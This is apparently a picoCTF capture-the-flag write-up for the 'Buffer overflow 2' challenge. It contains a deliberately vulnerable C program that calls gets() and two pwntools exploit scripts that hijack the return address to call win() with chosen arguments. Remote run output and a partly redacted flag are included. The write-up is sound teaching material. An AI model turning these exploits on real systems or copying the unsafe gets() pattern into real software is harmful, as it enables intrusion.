Buffer overflow 2

Solver: j jktrn
Authors: Sanjay C., Palash Oswal
Category: Binary Exploitation (pwn)
Points: 300
Files: vuln vuln.c

Control the return address and arguments.
This time you’ll need to control the arguments to the function you return to! Can you get the flag from this program? Connect with it using: $ nc saturn.picoctf.net [PORT]

Warning

Warning: This is an instance-based challenge. Port info will be redacted alongside the last eight characters of the flag, as they are dynamic.

$ checksec vuln
[*] '/home/kali/ctfs/pico22/buffer-overflow-2/vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

Let’s check out our source code:

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <string.h>
4
#include <unistd.h>
5
#include <sys/types.h>
6

7
#define BUFSIZE 100
8
#define FLAGSIZE 64
9

10
void win(unsigned int arg1, unsigned int arg2) {
11
    char buf[FLAGSIZE];
12
    FILE *f = fopen("flag.txt","r");
13
    if (f == NULL) {
14
        printf("%s %s", "Please create 'flag.txt' in this directory with your",
15
                        "own debugging flag.\n");
16
        exit(0);
17
    }
18

19
    fgets(buf,FLAGSIZE,f);
20
    if (arg1 != 0xCAFEF00D)
21
        return;
22
    if (arg2 != 0xF00DF00D)
23
        return;
24
    printf(buf);
25
}
26

27
void vuln(){
28
    char buf[BUFSIZE];
29
    gets(buf);
30
    puts(buf);
31
}
32

33
int main(int argc, char **argv){
34

35
    setvbuf(stdout, NULL, _IONBF, 0);
36

37
    gid_t gid = getegid();
38
    setresgid(gid, gid, gid);
39

40
    puts("Please enter your string: ");
41
    vuln();
42
    return 0;
43
}

Looking at the win() function, we can see that two arguments are required that need to be passed into the function to receive the flag. Two guard clauses lay above the flag print:

10
void win(unsigned int arg1, unsigned int arg2) {
11
    char buf[FLAGSIZE];
12
    FILE *f = fopen("flag.txt","r");
13
    if (f == NULL) {
14
        printf("%s %s", "Please create 'flag.txt' in this directory with your",
15
                        "own debugging flag.\n");
16
        exit(0);
17
    }
18

19
    fgets(buf,FLAGSIZE,f);
20
    if (arg1 != 0xCAFEF00D)
21
        return;
22
    if (arg2 != 0xF00DF00D)
23
        return;
24
    printf(buf);
25
}

The goal is simple: call win(0xCAFEF00D, 0xF00DF00D)! We’ll be doing it the hard way (for a learning experience), in addition to a more advanced easy way. Let’s get started.

I: The Hard Way

We can apply a lot from what we learned in Buffer overflow 1. The first thing we should do is find the offset, which requires no hassle with pwntools helpers! Although we’ll get actual number here, I won’t include it in the final script for the sake of not leaving out any steps. Simply segfault the process with a cyclic string, read the core dump’s fault address ($eip) and throw it into cyclic_find():

$ python3 -q
>>> from pwn import *
>>> elf = context.binary = ELF('./vuln')
[*] '/home/kali/ctfs/pico22/buffer-overflow-2/vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
>>> p = process(elf.path)
[x] Starting local process '/home/kali/ctfs/pico22/buffer-overflow-2/vuln'
[+] Starting local process '/home/kali/ctfs/pico22/buffer-overflow-2/vuln': pid 2777
>>> p.sendline(cyclic(128))
>>> p.wait()
[*] Process '/home/kali/ctfs/pico22/buffer-overflow-2/vuln' stopped with exit code -11 (SIGSEGV) (pid 2777)
>>> core = Corefile('./core')
[x] Parsing corefile...
[*] '/home/kali/ctfs/pico22/buffer-overflow-2/core'
    Arch:      i386-32-little
    EIP:       0x62616164
    ESP:       0xffafca40
    Exe:       '/home/kali/ctfs/pico22/buffer-overflow-2/vuln' (0x8048000)
    Fault:     0x62616164
[+] Parsing corefile...: Done
>>> cyclic_find(0x62616164)
112

The next thing we need to know about is the way functions are laid out on the stack. Let’s recall the diagram I drew out earlier:

Stack Diagram

If we want to call a function with parameters, we’ll need to include the base pointer alongside a return address, which can simply be main(). With this, we can basically copy our script over from Buffer overflow 1 with a few tweaks to the payload:

1
#!/usr/bin/env python3
2
from pwn import *
3

4
elf = context.binary = ELF('./vuln', checksec=False)    # sets elf object
5
host, port = 'saturn.picoctf.net', [PORT]
6

7
p = process(elf.path)        # creates local process w/ elf object
8
p.sendline(cyclic(128))      # sends cyclic pattern to crash
9
p.wait()                     # sigsegv generates core dump
10
core = Coredump('./core')    # parses core dump file
11

12
payload = flat([
13
    {cyclic_find(core.eip): elf.symbols.win},    # pads win address
14
    elf.symbols.main,                            # return address
15
    0xCAFEF00D,                                  # parameter 1
16
    0xF00DF00D                                   # parameter 2
17
])
18

19
if args.REMOTE:
20
    p = remote(host, port)
21
else:
22
    p = process(elf.path)
23

24
p.sendline(payload)
25
p.interactive()

Let’s run it on the remote server:

$ python3 buffer-overflow-2.py REMOTE
[+] Starting local process '/home/kali/ctfs/pico22/buffer-overflow-2/vuln': pid 3988
[*] Process '/home/kali/ctfs/pico22/buffer-overflow-2/vuln' stopped with exit code -11 (SIGSEGV) (pid 3988)
[+] Parsing corefile...: Done
[*] '/home/kali/ctfs/pico22/buffer-overflow-2/core'
    Arch:      i386-32-little
    EIP:       0x62616164
    ESP:       0xffca3290
    Exe:       '/home/kali/ctfs/pico22/buffer-overflow-2/vuln' (0x8048000)
    Fault:     0x62616164
[+] Opening connection to saturn.picoctf.net on port [PORT]: Done
[*] Switching to interactive mode
Please enter your string:
\\xf0\\xfe\\xcadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaaavaaawaaaxaaayaaazaabbaabcaab\\x96\\x92\\x04r\\x93\\x04
picoCTF{argum3nt5_4_d4yZ_[REDACTED]}

II: The Easy Way

But… what if you wanted to be an even more lazy pwner? Well, you’re in luck, because I present to you: the pwntools ROP object! By throwing our elf object into ROP() it transforms, and we can use it to automatically call functions and build chains! Here it is in action:

1
#!/usr/bin/env python3
2
from pwn import *
3

4
elf = context.binary = ELF('./vuln' checksec=False)    # sets elf object
5
rop = ROP(elf)                                         # creates ROP object
6
host, port = 'saturn.picoctf.net', [PORT]
7

8
p = process(elf.path)        # creates local process w/ elf object
9
p.sendline(cyclic(128))      # sends cyclic pattern to crash
10
p.wait()                     # sigsegv generates core dump
11
core = Coredump('./core')    # parses core dump file
12

13
rop.win(0xCAFEF00D, 0xF00DF00D)                        # Call win() with args
14
payload = fit({cyclic_find(core.eip): rop.chain()})    # pad ROP chain
15

16
if args.REMOTE:
17
    p = remote(host, port)
18
else:
19
    p = process(elf.path)
20

21
p.sendline(payload)
22
p.interactive()

Let’s run it on the remote server:

$ python3 buffer-overflow-2-automated.py REMOTE
[*] Loaded 10 cached gadgets for './vuln'
[+] Starting local process '/home/kali/ctfs/pico22/buffer-overflow-2/vuln': pid 4993
[*] Process '/home/kali/ctfs/pico22/buffer-overflow-2/vuln' stopped with exit code -11 (SIGSEGV) (pid 4993)
[+] Parsing corefile...: Done
[*] '/home/kali/ctfs/pico22/buffer-overflow-2/core'
    Arch:      i386-32-little
    EIP:       0x62616164
    ESP:       0xffd07fc0
    Exe:       '/home/kali/ctfs/pico22/buffer-overflow-2/vuln' (0x8048000)
    Fault:     0x62616164
[+] Opening connection to saturn.picoctf.net on port [PORT]: Done
[*] Switching to interactive mode
Please enter your string:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaab\\x96\\x\\xf0\\xfe\\xca
picoCTF{argum3nt5_4_d4yZ_[REDACTED]}
$ [*] Got EOF while reading in interactive

We’ve successfully called a function with arguments through buffer overflow!